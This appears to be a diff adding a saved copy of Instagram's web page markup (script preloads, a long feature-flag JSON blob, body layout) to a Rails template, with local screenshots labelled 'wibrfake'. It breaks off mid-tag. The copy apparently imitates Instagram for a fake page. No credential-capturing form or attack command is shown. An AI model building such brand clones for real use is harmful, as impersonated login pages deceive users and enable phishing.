<link rel="preload" href="Instagram_files/hNTWiqhsTPA.js" as="script" crossorigin="anonymous" nonce=""><script src="Instagram_files/hNTWiqhsTPA.js" data-bootloader-hash="680GOIE" async="1" crossorigin="anonymous" data-p=":1" data-btmanifest="1020948869_main" data-c="1"></script>
|
7
|
+
<link rel="preload" href="Instagram_files/POK8GQXAhJcTb_8oQHLG8MYn7EseCKI-MSlMCm2p6ofUzwAysWRdQAQxNEkM4.js" as="script" crossorigin="anonymous" nonce=""><script src="Instagram_files/POK8GQXAhJcTb_8oQHLG8MYn7EseCKI-MSlMCm2p6ofUzwAysWRdQAQxNEkM4.js" data-bootloader-hash="ufdnA0a" async="1" crossorigin="anonymous" data-p=":35,33,40,37,100,42,4,25,95,39,24,99,36,50,103,91,77,2,140,262,45,43,47,17,44,31,32,23,15,14" data-btmanifest="1020948869_main" data-c="1"></script>
|
8
|
+
<link rel="preload" href="Instagram_files/6SK80XAu3pk.js" as="script" crossorigin="anonymous" nonce=""><script src="Instagram_files/6SK80XAu3pk.js" data-bootloader-hash="vbvXlft" async="1" crossorigin="anonymous" data-p=":38" data-btmanifest="1020948869_main" data-c="1"></script>
|
9
|
+
<link rel="preload" href="Instagram_files/IPq4OqBG-bL.js" as="script" crossorigin="anonymous" nonce=""><script src="Instagram_files/IPq4OqBG-bL.js" data-bootloader-hash="sgs/F9K" async="1" crossorigin="anonymous" data-p=":34" data-btmanifest="1020948869_main" data-c="1"></script>
|
10
|
+
<link rel="preload" href="Instagram_files/CHpxI5xzrCj.js" as="script" crossorigin="anonymous" nonce=""><script src="Instagram_files/CHpxI5xzrCj.js" data-bootloader-hash="+WemAQg" async="1" crossorigin="anonymous" data-p=":8" data-btmanifest="1020948869_main" data-c="1"></script>
|
11
|
+
<link rel="preload" href="Instagram_files/FezhHDLy-cIbXKiwsrjqgb9qMEkYMFZyz.js" as="script" crossorigin="anonymous" nonce=""><script src="Instagram_files/FezhHDLy-cIbXKiwsrjqgb9qMEkYMFZyz.js" data-bootloader-hash="kLnz7V1" async="1" crossorigin="anonymous" data-p=":21,205,20" data-btmanifest="1020948869_main" data-c="1"></script>
|
12
|
+
<link rel="preload" href="Instagram_files/c5zMMKzNvd6.js" as="script" crossorigin="anonymous" nonce=""><script src="Instagram_files/c5zMMKzNvd6.js" data-bootloader-hash="J212E5D" async="1" crossorigin="anonymous" data-p=":30" data-btmanifest="1020948869_main" data-c="1"></script>
|
13
|
+
<link rel="preload" href="Instagram_files/92SZKLkG6-T.js" as="script" crossorigin="anonymous" nonce=""><script src="Instagram_files/92SZKLkG6-T.js" data-bootloader-hash="a/1e86Q" async="1" crossorigin="anonymous" data-p=":16" data-btmanifest="1020948869_main" data-c="1"></script>
|
14
|
+
<link rel="preload" href="Instagram_files/Zsp5BL-MRHI.js" as="script" crossorigin="anonymous" nonce=""><script src="Instagram_files/Zsp5BL-MRHI.js" data-bootloader-hash="Pboc6+2" async="1" crossorigin="anonymous" data-p=":48" data-btmanifest="1020948869_main" data-c="1"></script>
|
15
|
+
|
16
|
+
|
17
|
+
<!--EF-->
|
18
|
+
|
19
|
+
<title>Instagram</title>
|
20
|
+
<script type="application/json" data-content-len="18927" data-sjs="">{"require":[["HasteSupportData","handle",null,[{"clpData":{"6476":{"r":1000,"s":1},"1744178":{"r":1,"s":1},"1744234":{"r":1},"1814852":{"r":1},"1828905":{"r":1},"1829320":{"r":1},"1829321":{"r":1},"1836368":{"r":1,"s":1},"1838142":{"r":1,"s":1},"1962341":{"r":1,"s":1},"29":{"r":1,"s":1},"636":{"r":1,"s":1},"1791":{"r":1},"2060":{"r":1000,"s":1},"2343":{"r":1,"s":1},"3707":{"r":1,"s":1},"3949":{"r":1},"3950":{"r":1},"4156":{"r":1,"s":1},"4157":{"r":1,"s":1},"4158":{"r":1,"s":1},"4159":{"r":1,"s":1},"4160":{"r":1,"s":1},"4161":{"r":1,"s":1},"4172":{"r":1,"s":1},"4173":{"r":1,"s":1},"5537":{"r":1,"s":1},"5538":{"r":1,"s":1},"5613":{"r":1,"s":1},"5674":{"r":1},"5688":{"r":1,"s":1},"5851":{"r":1,"s":1},"5852":{"r":1,"s":1},"5853":{"r":1,"s":1},"5854":{"r":1,"s":1},"6647":{"r":1,"s":1},"6648":{"r":1,"s":1},"6661":{"r":1,"s":1},"6662":{"r":1,"s":1},"1744247":{"r":1},"1744249":{"r":1},"1837559":{"r":1},"1843988":{"r":1},"2571":{"r":1,"s":1},"6610":{"r":1,"s":1},"1746397":{"r":1,"s":1},"4530":{"r":1,"s":1},"5883":{"r":1,"s":1},"5884":{"r":1,"s":1},"5885":{"r":1,"s":1},"5886":{"r":1,"s":1},"5906":{"r":1,"s":1},"5907":{"r":1},"5908":{"r":1,"s":1},"5909":{"r":1,"s":1},"5910":{"r":1,"s":1},"5911":{"r":1,"s":1},"5912":{"r":1,"s":1},"499":{"r":1,"s":1},"5241":{"r":1,"s":1},"5944":{"r":1,"s":1},"5945":{"r":1,"s":1},"5946":{"r":1,"s":1},"5947":{"r":1,"s":1},"4180":{"r":1,"s":1},"4187":{"r":1,"s":1},"4188":{"r":1,"s":1},"4189":{"r":1,"s":1},"4193":{"r":1,"s":1},"5139":{"r":1,"s":1},"5227":{"r":1},"5678":{"r":1},"1745":{"r":1},"2686":{"r":1,"s":1},"3085":{"r":1},"3086":{"r":1},"3087":{"r":1},"3088":{"r":1},"3089":{"r":1},"3175":{"r":1,"s":1},"3584":{"r":1},"4344":{"r":1},"4526":{"r":1},"4527":{"r":1},"4528":{"r":1},"4625":{"r":1,"s":1},"5133":{"r":1,"s":1},"5141":{"r":1,"s":1},"5238":{"r":1,"s":1},"5242":{"r":1,"s":1},"5243":{"r":1,"s":1},"5633":{"r":1},"5634":{"r":1},"5636":{"r":1},"1744552":{"r":10000},"1860192":{"r":1,"s":1},"6508":{"r":1,"s":1},"364":{"r":1,"s":1},"365":{"r":1,"s":1},"3351":{"r":1},"5864":{"r":1,"s":1}},"gkxData":{"25299":{"result":false,"hash":"AT4qVySyIc6FL322M3M"},"25300":{"result":false,"hash":"AT4U_eALLBIK9Sgl4YQ"},"25301":{"result":true,"hash":"AT7HHgocgT15yJm4Kt0"},"25359":{"result":true,"hash":"AT75CT4-B9h4J50zyB8"},"25376":{"result":false,"hash":"AT7kzFxroeRE9U68kOg"},"25363":{"result":false,"hash":"AT6GEQgHSnGcLbs7vc0"},"25343":{"result":true,"hash":"AT7hNovF0Rkb9Ua6ck4"},"25344":{"result":false,"hash":"AT5sP-6HzlJypb89bpc"},"25349":{"result":false,"hash":"AT4lNeuuoKcPqQ2xdUo"},"3485":{"result":true,"hash":null},"7686":{"result":false,"hash":null},"7687":{"result":false,"hash":null},"21075":{"result":false,"hash":null},"23433":{"result":false,"hash":null},"5415":{"result":false,"hash":null},"7742":{"result":false,"hash":null},"8068":{"result":false,"hash":null},"8859":{"result":false,"hash":null},"8869":{"result":false,"hash":null},"9063":{"result":false,"hash":null},"20935":{"result":true,"hash":null},"20936":{"result":false,"hash":null},"196":{"result":false,"hash":null},"329":{"result":false,"hash":null},"417":{"result":false,"hash":null},"1093":{"result":false,"hash":null},"1154":{"result":true,"hash":null},"1514":{"result":false,"hash":null},"1534":{"result":true,"hash":null},"1624":{"result":false,"hash":null},"2160":{"result":false,"hash":null},"2641":{"result":false,"hash":null},"4008":{"result":false,"hash":null},"4064":{"result":false,"hash":null},"4161":{"result":false,"hash":null},"4252":{"result":false,"hash":null},"5196":{"result":false,"hash":null},"5247":{"result":true,"hash":null},"5258":{"result":true,"hash":null},"5303":{"result":true,"hash":null},"5607":{"result":false,"hash":null},"5679":{"result":false,"hash":null},"6375":{"result":false,"hash":null},"6796":{"result":false,"hash":null},"7024":{"result":false,"hash":null},"7604":{"result":false,"hash":null},"8029":{"result":false,"hash":null},"8460":{"result":false,"hash":null},"8570":{"result":true,"hash":null},"8821":{"result":false,"hash":null},"9389":{"result":false,"hash":null},"10182":{"result":false,"hash":null},"10233":{"result":false,"hash":null},"10726":{"result":false,"hash":null},"10863":{"result":false,"hash":null},"10865":{"result":false,"hash":null},"20836":{"result":false,"hash":null},"20921":{"result":true,"hash":null},"20922":{"result":true,"hash":null},"20923":{"result":true,"hash":null},"20924":{"result":true,"hash":null},"20925":{"result":true,"hash":null},"20926":{"result":true,"hash":null},"20942":{"result":false,"hash":null},"20980":{"result":false,"hash":null},"20981":{"result":false,"hash":null},"20982":{"result":false,"hash":null},"20983":{"result":false,"hash":null},"20984":{"result":true,"hash":null},"20985":{"result":false,"hash":null},"20987":{"result":false,"hash":null},"20988":{"result":false,"hash":null},"21003":{"result":false,"hash":null},"21004":{"result":false,"hash":null},"21005":{"result":false,"hash":null},"21043":{"result":false,"hash":null},"21050":{"result":false,"hash":null},"21051":{"result":false,"hash":null},"21053":{"result":false,"hash":null},"21055":{"result":false,"hash":null},"21056":{"result":false,"hash":null},"21057":{"result":false,"hash":null},"21058":{"result":true,"hash":null},"21089":{"result":false,"hash":null},"21095":{"result":false,"hash":null},"21106":{"result":true,"hash":null},"21107":{"result":false,"hash":null},"21117":{"result":false,"hash":null},"22681":{"result":false,"hash":null},"22792":{"result":false,"hash":null},"22803":{"result":false,"hash":null},"22826":{"result":false,"hash":null},"22875":{"result":false,"hash":null},"22876":{"result":true,"hash":null},"22877":{"result":true,"hash":null},"22968":{"result":false,"hash":null},"22979":{"result":true,"hash":null},"23406":{"result":false,"hash":null},"23415":{"result":false,"hash":null},"24215":{"result":false,"hash":null},"24263":{"result":false,"hash":null},"26340":{"result":false,"hash":null},"26341":{"result":false,"hash":null},"26342":{"result":false,"hash":null},"340":{"result":false,"hash":null},"579":{"result":false,"hash":null},"1196":{"result":false,"hash":null},"1605":{"result":false,"hash":null},"1667":{"result":false,"hash":null},"2345":{"result":false,"hash":null},"3190":{"result":false,"hash":null},"4867":{"result":false,"hash":null},"5380":{"result":false,"hash":null},"5620":{"result":false,"hash":null},"6181":{"result":false,"hash":null},"6536":{"result":false,"hash":null},"6626":{"result":false,"hash":null},"6676":{"result":false,"hash":null},"6708":{"result":false,"hash":null},"8772":{"result":false,"hash":null},"10390":{"result":false,"hash":null},"25336":{"result":false,"hash":null},"25377":{"result":false,"hash":null},"25386":{"result":false,"hash":null},"25392":{"result":false,"hash":null},"32992":{"result":false,"hash":null},"32993":{"result":false,"hash":null},"32994":{"result":false,"hash":null},"33000":{"result":true,"hash":null},"33001":{"result":false,"hash":null},"33060":{"result":false,"hash":null},"4737":{"result":false,"hash":null},"7170":{"result":false,"hash":null},"20864":{"result":true,"hash":null},"20865":{"result":false,"hash":null},"23413":{"result":false,"hash":null},"23414":{"result":false,"hash":null},"366":{"result":false,"hash":null},"3399":{"result":false,"hash":null},"4516":{"result":false,"hash":null},"10501":{"result":false,"hash":null},"10725":{"result":false,"hash":null},"20858":{"result":false,"hash":null},"20860":{"result":false,"hash":null},"20863":{"result":false,"hash":null},"1326":{"result":false,"hash":null},"2442":{"result":false,"hash":null},"3123":{"result":true,"hash":null},"174":{"result":true,"hash":null},"3129":{"result":false,"hash":null},"3133":{"result":true,"hash":null},"3353":{"result":true,"hash":null},"32979":{"result":false,"hash":null},"1704":{"result":true,"hash":null},"2887":{"result":true,"hash":null},"1440":{"result":true,"hash":null},"2717":{"result":true,"hash":null},"5230":{"result":false,"hash":null},"6383":{"result":true,"hash":null},"6489":{"result":false,"hash":null},"22879":{"result":false,"hash":null},"25364":{"result":false,"hash":null},"25366":{"result":false,"hash":null},"9690":{"result":false,"hash":null},"226":{"result":false,"hash":null},"1008":{"result":false,"hash":null},"1317":{"result":false,"hash":null},"1551":{"result":false,"hash":null},"1810":{"result":true,"hash":null},"4150":{"result":false,"hash":null},"4559":{"result":false,"hash":null},"4871":{"result":false,"hash":null},"9859":{"result":false,"hash":null},"10674":{"result":false,"hash":null},"21118":{"result":false,"hash":null},"22787":{"result":false,"hash":null},"22809":{"result":true,"hash":null},"22874":{"result":false,"hash":null},"24329":{"result":false,"hash":null},"24330":{"result":false,"hash":null},"24381":{"result":false,"hash":null},"25293":{"result":false,"hash":null},"25345":{"result":true,"hash":null},"25346":{"result":false,"hash":null},"25348":{"result":false,"hash":null},"25355":{"result":true,"hash":null},"26335":{"result":false,"hash":null},"26336":{"result":false,"hash":null},"26337":{"result":false,"hash":null},"33068":{"result":false,"hash":null},"4070":{"result":false,"hash":null},"23403":{"result":false,"hash":null},"23404":{"result":false,"hash":null},"8049":{"result":false,"hash":null},"8708":{"result":false,"hash":null},"9861":{"result":true,"hash":null},"10211":{"result":false,"hash":null},"10662":{"result":false,"hash":null},"10839":{"result":false,"hash":null},"10850":{"result":false,"hash":null},"21063":{"result":false,"hash":null},"21069":{"result":false,"hash":null},"21071":{"result":false,"hash":null},"21072":{"result":false,"hash":null},"33056":{"result":false,"hash":null},"25403":{"result":false,"hash":null},"25572":{"result":false,"hash":null}},"ixData":{"502062":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","w":20,"h":20,"p":"-164px -97px","sz":"auto"},"225223":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","w":96,"h":96,"p":"0 -97px","sz":"auto"},"225234":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","w":96,"h":96,"p":"0 -194px","sz":"auto"},"163346":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","w":56,"h":56,"p":"0 -1051px","sz":"auto"},"841170":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","w":192,"h":96,"p":"0 0","sz":"auto"},"841172":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","w":192,"h":96,"p":"0 -97px","sz":"auto"},"841174":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","w":192,"h":96,"p":"0 -194px","sz":"auto"},"841176":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","w":192,"h":96,"p":"0 -291px","sz":"auto"},"841178":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","w":192,"h":96,"p":"0 -388px","sz":"auto"},"841180":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","w":192,"h":96,"p":"0 -485px","sz":"auto"},"841182":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","w":192,"h":96,"p":"0 -582px","sz":"auto"},"841184":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","w":192,"h":96,"p":"0 -679px","sz":"auto"},"841186":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","w":192,"h":96,"p":"0 -776px","sz":"auto"},"841188":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","w":192,"h":96,"p":"0 -873px","sz":"auto"},"879111":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","w":80,"h":80,"p":"0 -970px","sz":"auto"},"879114":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yV\/r\/EuEooaq6QG5.png","w":64,"h":64,"p":"-81px -970px","sz":"auto"},"148908":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","w":96,"h":96,"p":"0 -298px","sz":"auto"},"222729":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","w":76,"h":76,"p":"-97px -298px","sz":"auto"},"222730":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","w":175,"h":51,"p":"0 -52px","sz":"auto"},"222731":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","w":175,"h":51,"p":"0 0","sz":"auto"},"835354":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","w":96,"h":96,"p":"0 -395px","sz":"auto"},"877412":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","w":144,"h":96,"p":"0 -104px","sz":"auto"},"877413":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yB\/r\/E7m8ZCMOFDS.png","w":144,"h":96,"p":"0 -201px","sz":"auto"},"478233":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","w":20,"h":20,"p":"-97px -122px","sz":"auto"},"512647":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","w":20,"h":20,"p":"-122px -97px","sz":"auto"},"514454":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","w":20,"h":20,"p":"-143px -97px","sz":"auto"},"478231":{"sprited":2,"spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","_spi":"https:\/\/static.cdninstagram.com\/rsrc.php\/v4\/yr\/r\/86FqrT4qV43.png","w":12,"h":12,"p":"-97px -143px","sz":"auto"}},"metaconfigData":{"73":{"value":false},"143":{"value":false},"179":{"value":false},"3":{"value":false}},"qexData":{"354":{"r":null},"494":{"r":false},"751":{"r":false},"889":{"r":false},"1696":{"r":null},"14":{"r":false},"324":{"r":false},"365":{"r":null},"611":{"r":null,"l":"J{\"qeid\":\"208012EF-5BA7-411B-AAFF-95F0AA807F5C\",\"u\":\"\",\"t\":\"ig_web_device_id\",\"gks\":[],\"qe\":null}"},"881":{"r":null},"1003":{"r":false},"1250":{"r":false},"1281":{"r":null},"1283":{"r":null},"1397":{"r":null},"1406":{"r":null},"1483":{"r":false},"1701":{"r":0},"1838":{"r":false},"1844":{"r":true},"3198":{"r":null},"3199":{"r":null},"37":{"r":null},"82":{"r":null},"206":{"r":null},"252":{"r":null},"659":{"r":true,"l":"J{\"qeid\":\"208012EF-5BA7-411B-AAFF-95F0AA807F5C\",\"u\":\"\",\"t\":\"ig_web_device_id\",\"gks\":[],\"qe\":null}"},"748":{"r":null},"821":{"r":true},"1402":{"r":true,"l":"J{\"qeid\":\"208012EF-5BA7-411B-AAFF-95F0AA807F5C\",\"u\":\"\",\"t\":\"ig_web_device_id\",\"gks\":[],\"qe\":null}"},"1488":{"r":null},"3139":{"r":false},"103":{"r":false},"343":{"r":null},"447":{"r":false},"471":{"r":null},"1251":{"r":false},"1683":{"r":true},"1733":{"r":false},"1756":{"r":false},"3243":{"r":false},"3265":{"r":true},"33":{"r":false},"198":{"r":false},"1510":{"r":null},"2155":{"r":false},"2156":{"r":false},"3256":{"r":null},"314":{"r":false},"548":{"r":false},"1849":{"r":false},"1850":{"r":false},"2158":{"r":false},"13":{"r":null},"246":{"r":null},"295":{"r":null},"308":{"r":null},"639":{"r":null},"1492":{"r":0},"1524":{"r":null},"1586":{"r":null},"1657":{"r":false},"104":{"r":null},"128":{"r":null},"344":{"r":null},"388":{"r":null}},"qplData":{"194":{"r":1},"685":{"r":1},"2410":{"r":1},"2702":{"r":1},"6204":{"r":7},"6702":{"r":1},"21":{"r":1},"192":{"r":2000},"334":{"r":2000},"1411":{"r":100},"1597":{"r":1},"1885":{"r":1},"6287":{"r":1},"6915":{"r":1},"8327":{"r":1},"2242":{"r":10000},"2258":{"r":1000000},"2267":{"r":10000},"2268":{"r":10000},"2396":{"r":10000},"2408":{"r":10000},"4750":{"r":1},"1389":{"r":2000},"2561":{"r":100},"955":{"r":1},"1360":{"r":100},"1388":{"r":1},"2172":{},"3796":{"r":1},"5252":{"r":1}},"justknobxData":{"1806":{"r":true},"3323":{"r":true},"144":{"r":true},"450":{"r":true},"494":{"r":true},"674":{"r":true},"957":{"r":false},"1417":{"r":true},"1849":{"r":true},"2269":{"r":true},"2349":{"r":false},"2552":{"r":false},"2743":{"r":true},"3409":{"r":true},"3457":{"r":true},"3478":{"r":true},"3805":{"r":true},"3809":{"r":true},"76":{"r":false},"82":{"r":true},"306":{"r":true},"380":{"r":true},"643":{"r":true},"1126":{"r":true},"1413":{"r":true},"1540":{"r":true},"1980":{"r":true},"2928":{"r":false},"3076":{"r":true},"3204":{"r":true},"2635":{"r":true},"87":{"r":true},"3146":{"r":true},"73":{"r":25000},"653":{"r":20000},"757":{"r":false},"130":{"r":true},"138":{"r":false},"341":{"r":false},"356":{"r":true},"604":{"r":false},"713":{"r":true},"887":{"r":true},"995":{"r":true},"1641":{"r":true},"1759":{"r":true},"1998":{"r":true},"1999":{"r":false},"2004":{"r":false},"3727":{"r":true},"55":{"r":true},"2233":{"r":true}}}]]]}</script>
|
21
|
+
<link href="Instagram_files/L08S0xu6K_I.js" rel="preload" as="script" crossorigin="anonymous"><script src="Instagram_files/L08S0xu6K_I.js" async="" crossorigin="anonymous" data-btmanifest="1020948869_main" data-bootloader-hash-client="wJ8iTPu"></script><link href="Instagram_files/8b22m6VDHyD.js" rel="preload" as="script" crossorigin="anonymous"><script src="Instagram_files/8b22m6VDHyD.js" async="" crossorigin="anonymous" data-btmanifest="1020948869_main" data-bootloader-hash-client="YfY0wDs"></script><link href="Instagram_files/bxI-4UmU-ZS1eSNEivWZVMYXVUpTB_MlbSVhs_OupRbi6FX6W_V-V5GIqg5Ag.js" rel="preload" as="script" crossorigin="anonymous"><script src="Instagram_files/bxI-4UmU-ZS1eSNEivWZVMYXVUpTB_MlbSVhs_OupRbi6FX6W_V-V5GIqg5Ag.js" async="" crossorigin="anonymous" data-btmanifest="1020948869_main" data-bootloader-hash-client="TiwQGd+"></script><link href="Instagram_files/rhxb4sagAR3.js" rel="preload" as="script" crossorigin="anonymous"><script src="Instagram_files/rhxb4sagAR3.js" async="" crossorigin="anonymous" data-btmanifest="1020948869_main" data-bootloader-hash-client="FXDnn71"></script><link href="Instagram_files/ffLrtj_wWzi.js" rel="preload" as="script" crossorigin="anonymous"><script src="Instagram_files/ffLrtj_wWzi.js" async="" crossorigin="anonymous" data-btmanifest="1020948869_main" data-bootloader-hash-client="c0LMFtP"></script><link href="Instagram_files/njIOUngbfHU.js" rel="preload" as="script" crossorigin="anonymous"><script src="Instagram_files/njIOUngbfHU.js" async="" crossorigin="anonymous" data-btmanifest="1020948869_main" data-bootloader-hash-client="n2L8zN8"></script><link href="Instagram_files/HXaGrtSxL75.js" rel="preload" as="script" crossorigin="anonymous"><script src="Instagram_files/HXaGrtSxL75.js" async="" crossorigin="anonymous" data-btmanifest="1020948869_main" data-bootloader-hash-client="wvcA3Vp"></script><link href="Instagram_files/qkaf6dE6uJd.js" rel="preload" as="script" crossorigin="anonymous"><script src="Instagram_files/qkaf6dE6uJd.js" async="" crossorigin="anonymous" data-btmanifest="1020948869_main" data-bootloader-hash-client="DTWRLUi"></script><link href="Instagram_files/BVSK-cMu09N.js" rel="preload" as="script" crossorigin="anonymous"><script src="Instagram_files/BVSK-cMu09N.js" async="" crossorigin="anonymous" data-btmanifest="1020948869_main" data-bootloader-hash-client="izgJhza"></script><link href="Instagram_files/7sm6EIbtFjH.js" rel="preload" as="script" crossorigin="anonymous"><script src="Instagram_files/7sm6EIbtFjH.js" async="" crossorigin="anonymous" data-btmanifest="1020948869_main" data-bootloader-hash-client="B7JXSEb"></script></head><body class="_ar45 system-fonts--body"><script type="application/json" data-content-len="91" data-sjs="">{"require":[["qplTimingsServerJS",null,null,["7482530692769266283","splash_screen_show"]]]}</script>
|
22
|
+
<div id="mount_0_0_N9"><div><div class=""><div class="x4afe7t x1v7wizp x1htlvfj x1a5igra xds687c x17qophe xixxii4 x13vifvy x1x85hfe x1s85apg"><div class="x1c74tu6 x1v7wizp x1w55rbo xa3vuyk xuoj239 xee5nap xh8yej3 x1so62im x1uzojwf xds687c x17qophe xixxii4 x13vifvy x1x85hfe"><div class="x1c74tu6 xa4qsjk x1eg1fw9 x1esw782 x12zrl2 xuoj239 xee5nap xh8yej3 x1so62im x1uzojwf"></div></div></div><div class="x9f619 x1n2onr6 x1ja2u2z"><div class="x78zum5 xdt5ytf x1n2onr6 x1ja2u2z"><div class="x78zum5 xdt5ytf x1n2onr6 xat3117 xxzkxad"><div class="x78zum5 xdt5ytf x1t2pt76 x1n2onr6 x1ja2u2z x10cihs4"><div class="x9f619 xvbhtw8 x78zum5 x168nmei x13lgxp2 x5pf9jr xo71vjh x1uhb9sk x1plvlek xryxfnj x1c4vz4f x2lah0s x1q0g3np xqjyukv x1qjc9v5 x1oa3qoh x1qughib" style="height: 100%;"><div class="x10o80wk x14k21rp xh8yej3"><section class="x78zum5 xdt5ytf x1iyjqo2 xg6iff7"><main class="xvbhtw8 x78zum5 xdt5ytf x1iyjqo2 xl56j7k" role="main"><article class="x1qjc9v5 x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x78zum5 x1q0g3np x1iyjqo2 x2lah0s xk390pu xl56j7k xg87l8a xkrivgy xat24cr x1gryazu x1ykew4q xexx8yu x4uap5 xkhd6sd x1gan7if x11njtxf xh8yej3 x1d2lwc3"><div class="xamitd3 xm2v1qs x322q5f xx54hvc x1vk3w4 xuyhj88 xod5an3 x1gja9t xv4oxz2 xkxfa8k" style="display: none;"><div class="x1qjc9v5 x972fbf xcfux6l x1qhh985 xm0m39n x9f619 x78zum5 xdt5ytf x2lah0s xk390pu x18mmtl5 x1rcfgkt xexx8yu x4uap5 x18d9i69 xkhd6sd x1n2onr6 x11njtxf"><%= image_tag 'instagram/screenshot1.png', class: "x972fbf xcfux6l x1qhh985 xm0m39n xk390pu xns55qn xu96u03 xdj266r x11i5rnm xat24cr x1mh8g0r xg01cxk xexx8yu x4uap5 x18d9i69 xkhd6sd x10l6tqk x13vifvy x11njtxf xlshs6z xqyf9gi", alt: 'wibrfake'%><%= image_tag 'instagram/screenshot2.png', class: "x972fbf xcfux6l x1qhh985 xm0m39n xk390pu xns55qn xu96u03 xdj266r x11i5rnm xat24cr x1mh8g0r xexx8yu x4uap5 x18d9i69 xkhd6sd x10l6tqk 